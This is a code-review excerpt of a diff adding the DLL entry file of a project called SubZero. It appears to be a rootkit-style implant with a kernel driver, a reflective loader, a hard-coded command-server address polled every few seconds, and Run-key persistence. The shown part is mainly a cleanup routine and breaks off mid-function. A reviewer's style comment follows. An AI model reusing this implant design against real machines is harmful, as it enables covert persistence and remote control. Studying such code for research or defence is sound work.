Project/SubZeroDLL/dllmain.cpp

```diff
@@ -0,0 +1,117 @@
+#include "pch.h"
+#include "HttpClient.h"
+#include "ReflectiveLibraryLoader.h"
+#include "../SubZeroDriver/SubZeroCommon.h"
+#include "../SubZeroClient/SubZeroLoaderCommon.h"
+#include "../SubZeroUtils/RegistryManager.h"
+#include "../SubZeroUtils/ServiceManager.h"
+#include "../SubZeroUtils/AutoRegistryKeyHandle.h"
+
+const std::string IpAddress = "192.168.14.139";
+constexpr DWORD Port = 8080;
+constexpr DWORD SecondsBetweenFetches = 5;
+
+BOOL SubZeroCleanup() {	
+    try {
+    	// Uninstall Subzero driver
+        const ServiceManager serviceManager(DRIVER_NAMEW, DRIVER_FULL_PATH, SERVICE_KERNEL_DRIVER);
+        serviceManager.stopAndRemove();
+
+    	// Delete registry key
+        const AutoRegistryKeyHandle autoRegKey(RegistryManager::OpenRegistryKey(REG_SZ_KEY_ROOT, REG_RUN_KEY_PATH));
+        RegistryManager::DeleteRegistryValue(autoRegKey.get(), DRIVER_NAMEW);
+    }
+	catch(std::exception& exception) {
+		// TODO: Handle exception accordingly
+        return FALSE;
+	}
+
+	// Delete files
+    if (!(::DeleteFileW(DRIVER_FULL_PATH.c_str())))
+        if (::GetLastError() != ERROR_FILE_NOT_FOUND)
+            // TODO: Handle exception accordingly
+			return FALSE;
+
+    if (!(::DeleteFileW(LOADER_FULL_PATH.c_str())))
+        if (::GetLastError() != ERROR_FILE_NOT_FOUND)
```

Comment:
Use YODA notaions for better code safety, e.g.:
`if (ERROR_FILE_NOT_FOUND != ::GetLastError())`